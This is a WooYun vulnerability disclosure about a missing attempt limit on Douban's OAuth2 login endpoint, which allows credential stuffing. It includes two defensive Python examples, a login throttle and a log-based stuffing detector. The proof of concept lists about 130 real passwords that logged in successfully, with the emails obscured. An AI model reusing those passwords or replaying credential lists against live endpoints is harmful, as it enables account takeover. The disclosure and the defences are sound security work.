
Vulnerability Summary

Bug ID: wooyun-2015-0136042

Title: Douban third-party login endpoint flaw enables credential stuffing and leaks user accounts

Vendor: Douban

Author: sqlfeng

Submitted: 2015-08-23 21:02

Fixed: 2015-10-08 10:58

Published: 2015-10-08 10:58

Type: Design flaw / logic error

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)



Vulnerability Details

Disclosure status:

2015-08-23: Details sent to the vendor, awaiting processing
2015-08-24: Vendor confirmed; details visible to the vendor only
2015-09-03: Details disclosed to core white hats and domain experts
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public

Brief description:

Third-party login endpoint

Detailed description:

https://www.douban.com/service/auth2/auth?client_id=08710dbc5a7ae51c195329350f70af54&redirect_uri=http%3A%2F%2Fwww.zenlifestore.com%2Flogin%2Fgetloginfordouban&response_type=code
Login endpoints of this form (Douban's OAuth2 authorization endpoint, reached here through a third-party site's "log in with Douban" link) impose no limit on the number of login attempts. A list of leaked username/password pairs can therefore be replayed against the endpoint until valid ones are found (credential stuffing), and every pair that succeeds is a working Douban credential.
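The control the report says is missing, written here as an added example in Python (not Douban's code): a sliding-window cap on attempts per source address plus a cap on failed attempts per account, placed in front of the password check of an authorization endpoint such as the one above. The limits, salt, user store, addresses and credential list are assumptions constructed for the example; a single source replaying a list is cut off after the per-source limit even when one of its pairs is valid, and a distributed run against one account is cut off after the per-account limit.

```python
"""Added example (not Douban's code): throttling the password step of an
OAuth2 authorization endpoint. Limits, salt, user store and addresses are
assumptions chosen for illustration; the user store is constructed."""
import hashlib
import hmac
from collections import deque

_SALT = b"constructed-salt"  # a real deployment uses a random per-user salt


def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 10_000)


# Constructed user store: login -> password hash.
USERS = {
    "alice@example.com": _hash("correct-horse"),
    "bob@example.com": _hash("123456"),
}


class SlidingWindow:
    """Per-key event counter over the last `window_s` seconds."""

    def __init__(self, window_s):
        self.window_s = window_s
        self.events = {}  # key -> deque of timestamps

    def _live(self, key, now):
        q = self.events.setdefault(key, deque())
        while q and now - q[0] >= self.window_s:
            q.popleft()
        return q

    def count(self, key, now):
        return len(self._live(key, now))

    def record(self, key, now):
        self._live(key, now).append(now)

    def reset(self, key):
        self.events.pop(key, None)


class LoginThrottle:
    def __init__(self, ip_limit=20, ip_window=60, acct_limit=5, acct_window=900):
        self.ip_limit, self.acct_limit = ip_limit, acct_limit
        self.per_ip = SlidingWindow(ip_window)         # every attempt from a source
        self.per_account = SlidingWindow(acct_window)  # failed attempts on a login

    def authorize(self, ip, username, password, now):
        """302 = success (redirect to redirect_uri with a code), 401 = bad
        credentials, 429 = throttled. Neither failure code reveals whether
        the account exists: the per-account counter tracks any login string,
        and unknown logins still pay for a hash computation."""
        if self.per_ip.count(ip, now) >= self.ip_limit:
            return 429
        self.per_ip.record(ip, now)
        if self.per_account.count(username, now) >= self.acct_limit:
            return 429
        candidate = _hash(password)
        stored = USERS.get(username)
        if stored is not None and hmac.compare_digest(stored, candidate):
            self.per_account.reset(username)  # success clears the failure count
            return 302
        self.per_account.record(username, now)
        return 401


def simulate_stuffing_from_one_ip():
    """Constructed list: 25 guesses at unknown accounts, then bob's real pair."""
    t = LoginThrottle()
    pairs = [(f"user{i:02d}@example.com", "123456") for i in range(25)]
    pairs.append(("bob@example.com", "123456"))
    return [t.authorize("203.0.113.7", u, p, now=float(i)) for i, (u, p) in enumerate(pairs)]


def simulate_distributed_attack_on_one_account():
    """Eight sources each guess once at alice; then alice's real password is
    tried before and after the 900 s account window has elapsed."""
    t = LoginThrottle()
    out = [t.authorize(f"198.51.100.{i}", "alice@example.com", f"guess{i}", now=float(i))
           for i in range(8)]
    out.append(t.authorize("192.0.2.1", "alice@example.com", "correct-horse", now=10.0))
    out.append(t.authorize("192.0.2.1", "alice@example.com", "correct-horse", now=910.0))
    return out


def simulate_legitimate_user():
    """Two typos, the right password, then one more typo after the reset."""
    t = LoginThrottle()
    return [t.authorize("192.0.2.50", "alice@example.com", pw, now=float(i))
            for i, pw in enumerate(["wrong", "wrongg", "correct-horse", "wrong"])]


if __name__ == "__main__":
    print("one source, many accounts :", simulate_stuffing_from_one_ip())
    print("many sources, one account :", simulate_distributed_attack_on_one_account())
    print("legitimate user           :", simulate_legitimate_user())
```

The per-source cap counts successes as well as failures on purpose: a stuffing run is recognisable by volume of distinct logins from one place, not by its failure rate, and a run that has already found valid pairs would otherwise keep going. The per-account cap counts only failures and is cleared by a success, so a legitimate user who mistypes is never locked out by their own eventual correct login.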

Proof of concept:

[Screenshot: 1.png]

Results of replaying a credential list against the endpoint. A 302 is the redirect back to the redirect_uri carrying an authorization code, i.e. a successful login; the account column appears obfuscated on the page.


Payload1 (account)	Payload2 (password)	Status
[email protected] 101595 302
[email protected] 110112 302
[email protected] 111111 302
[email protected] 111111 302
[email protected] 11111111 302
[email protected] 1123581321 302
[email protected] 116116 302
[email protected] 120781269 302
[email protected] 121763469 302
[email protected] 123123 302
[email protected] 1233212 302
[email protected] 123456 302
[email protected] 12345zxcvb 302
[email protected] 123bing 302
[email protected] 125463 302
[email protected] 13127732113 302
[email protected] 13803262661 302
[email protected] 15021160628 302
[email protected] 159357 302
[email protected] 16569673 302
[email protected] 168vcd 302
[email protected] 16934150 302
[email protected] 1835Lay 302
[email protected] 19820926 302
[email protected] 19840616 302
[email protected] 19851120 302
[email protected] 19860126zz 302
[email protected] 19861025 302
[email protected] 19871008 302
[email protected] 19871013 302
[email protected] 19871206 302
[email protected] 1987523 302
[email protected] 19881011 302
[email protected] 19890404b 302
[email protected] 198917 302
[email protected] 19920521 302
[email protected] 2236831 302
[email protected] 23865942 302
[email protected] 243034478 302
[email protected] 246464 302
[email protected] 26606090 302
[email protected] 303971 302
[email protected] 306100608 302
[email protected] 3303153 302
[email protected] 3303855 302
[email protected] 3314161 302
[email protected] 3320110 302
[email protected] 3322342 302
[email protected] 354978028 302
[email protected] 40328642 302
[email protected] 403403 302
[email protected] 410202552 302
[email protected] 423156 302
[email protected] 471775 302
[email protected] 4754643 302
[email protected] 49192009 302
[email protected] 5106231990 302
[email protected] 519999999 302
[email protected] 520120 302
[email protected] 52012513 302
[email protected] 527505643 302
[email protected] 52mingming 302
[email protected] 540750 302
[email protected] 5529559 302
[email protected] 5645769 302
[email protected] 5772060 302
[email protected] 58421q 302
[email protected] 585858 302
[email protected] 597536395 302
[email protected] 59aiang 302
[email protected] 6158153 302
[email protected] 6225065 302
[email protected] 630417 302
[email protected] 64462888 302
[email protected] 66256991 302
[email protected] 696969 302
[email protected] 730913 302
[email protected] 743691 302
[email protected] 7758258 302
[email protected] 7758521 302
[email protected] 79356587 302
[email protected] 8100988 302
[email protected] 818168 302
[email protected] 8297193 302
[email protected] 8310207 302
[email protected] 840626 302
[email protected] 84109169 302
[email protected] 85127559 302
[email protected] 8565841 302
[email protected] 8601327 302
[email protected] 860613 302
[email protected] 86891992 302
[email protected] 870108 302
[email protected] 881119 302
[email protected] 881130 302
[email protected] 88297613 302
[email protected] 888567 302
[email protected] 970709 302
[email protected] a19880725 302
[email protected] admin123456 302
[email protected] andy2008 302
[email protected] at201314 302
[email protected] bxfllmzhu 302
[email protected] chen0806 302
[email protected] chenjietan 302
[email protected] cl123456 302
[email protected] ewaychen 302
[email protected] hao142753 302
[email protected] haoren 302
[email protected] iloveme 302
[email protected] jj3592371 302
[email protected] kknima 302
[email protected] l19900829 302
[email protected] lipengan 302
[email protected] luna19750502 302
[email protected] lw5211314 302
[email protected] mengbd520 302
[email protected] myself 302
[email protected] nokia880823 302
[email protected] qaz5989126 302
[email protected] shui2030jin 302
[email protected] tlj5201314 302
[email protected] wangbin 302
[email protected] wanghuijie520 302
[email protected] wj860320 302
[email protected] woaishuai 302
[email protected] wz1988 302
[email protected] x59734565 302
[email protected] yamaha123 302
[email protected] z86813092 302
[email protected] zr1989221 302
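For the operations side, an added example in Python (not from the report) that finds a run like the one tabulated above in web-server logs. The log line format, the thresholds and the sample lines are constructed for the example; the path is the authorization endpoint from the report. It flags any source address that attempts many distinct accounts against that path and lists the accounts whose attempt got a 302, which are the ones to force a password reset on and to re-examine for sessions and OAuth grants issued since.

```python
"""Added example (not from the report): spotting a credential-stuffing run
against the authorization endpoint in access logs. The log format, field
names, thresholds and sample lines are assumptions constructed for this
example."""
import re
from collections import defaultdict

# Assumed access-log shape: "<iso-ts> <client-ip> POST <path> user=<login> status=<code>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) POST (?P<path>\S+) user=(?P<user>\S+) status=(?P<status>\d{3})$"
)
AUTH_PATH = "/service/auth2/auth"


def constructed_log():
    """Constructed sample: one source cycling through 12 different accounts
    (three of them answered with a 302), a legitimate user retyping a
    password, one unrelated request and one malformed line."""
    lines = []
    for i in range(12):
        code = 302 if i in (3, 7, 11) else 401
        lines.append(f"2015-08-23T21:02:{i:02d} 203.0.113.7 POST {AUTH_PATH} "
                     f"user=u{i:02d}@example.com status={code}")
    lines += [
        f"2015-08-23T21:05:01 192.0.2.50 POST {AUTH_PATH} user=alice@example.com status=401",
        f"2015-08-23T21:05:09 192.0.2.50 POST {AUTH_PATH} user=alice@example.com status=401",
        f"2015-08-23T21:05:20 192.0.2.50 POST {AUTH_PATH} user=alice@example.com status=302",
        "2015-08-23T21:06:00 198.51.100.9 GET /people/ status=200",
        "garbage line that does not parse",
    ]
    return "\n".join(lines)


def parse_auth_attempts(text):
    """Yield only well-formed POSTs to the authorization path; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("path") == AUTH_PATH:
            yield m.groupdict()


def find_stuffing_sources(records, min_attempts=10, min_distinct_users=8):
    """Per source: attempt count, distinct logins tried, logins that got a 302.
    A source is flagged when it both tries enough times and spreads those
    tries over enough different accounts, which is what separates stuffing
    from one user fumbling their own password."""
    stats = defaultdict(lambda: {"attempts": 0, "users": set(), "hits": []})
    for r in records:
        s = stats[r["ip"]]
        s["attempts"] += 1
        s["users"].add(r["user"])
        if r["status"] == "302":
            s["hits"].append(r["user"])
    flagged = {}
    for ip, s in stats.items():
        if s["attempts"] >= min_attempts and len(s["users"]) >= min_distinct_users:
            flagged[ip] = {
                "attempts": s["attempts"],
                "distinct_users": len(s["users"]),
                "compromised": sorted(s["hits"]),
            }
    return flagged


def analyse_constructed_log():
    return find_stuffing_sources(parse_auth_attempts(constructed_log()))


if __name__ == "__main__":
    for ip, info in analyse_constructed_log().items():
        print(f"{ip}: {info['attempts']} attempts over {info['distinct_users']} accounts; "
              f"reset {', '.join(info['compromised'])}")
```

The thresholds are deliberately low for the sample; in production they are tuned against the site's own baseline, and the same grouping is worth running keyed on the OAuth client_id as well, since a stuffing tool replaying a captured third-party login URL will carry one client_id across all of its attempts.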

Suggested fix:

No idea...

Copyright notice: please credit sqlfeng@WooYun when reposting.


Vulnerability Response

Vendor response:

Severity: High

Rank: 10

Confirmed at: 2015-08-24 10:57

Vendor reply:

This is indeed a design flaw; we are organizing a fix immediately.

Latest status:

None